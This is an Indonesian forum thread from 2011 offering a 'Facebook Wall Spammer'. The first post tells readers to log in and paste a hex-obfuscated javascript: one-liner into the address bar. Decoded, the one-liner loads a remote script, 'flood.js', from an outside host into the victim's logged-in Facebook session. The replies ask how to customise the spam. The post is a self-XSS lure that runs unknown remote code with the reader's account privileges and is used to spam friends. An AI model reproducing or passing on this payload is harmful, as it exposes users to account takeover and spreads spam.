Page 1 of 1

Facebook Wall Spammer

PostPosted: Tue Jun 07, 2011 5:23 pm
by Darkzzzz
Dengan menggunakan JavaScript kita dapat melakukan aksi Wall Spammer, yaitu mengirimkan Wall satu per satu ke beberapa teman di Facebook.

1.Login ke Facebook.
2.Bersihkan address bar browser yang Bang Doel pakai dan masukkan script di bawah ini ke Address bar Browser yang kita pakai.

Code: Select all
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64\x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);


Jangan lupa tekan enter pas scriptnya udah di kopas ke Address Bar!

Image

Re: Facebook Wall Spammer

PostPosted: Thu Jun 09, 2011 7:49 pm
by xBOy_BOrNEo
bang , gimana cara ngubah tulisan yg mw kita post , hehe~ :D

Re: Facebook Wall Spammer

PostPosted: Thu Jun 09, 2011 7:51 pm
by xBOy_BOrNEo
bang , gimana cara ngubah tulisan yg mau kita post ?? hehe~ :?

Re: Facebook Wall Spammer

PostPosted: Sun Jul 03, 2011 7:31 am
by ksatria_web
bang, kok cuma "beberapa" jadi gak smua tmn ya bang???

Re: Facebook Wall Spammer

PostPosted: Sun Aug 07, 2011 7:26 am
by whitekidz
TOOLx om poni keren juga yang.. cerewet... ini man scricp y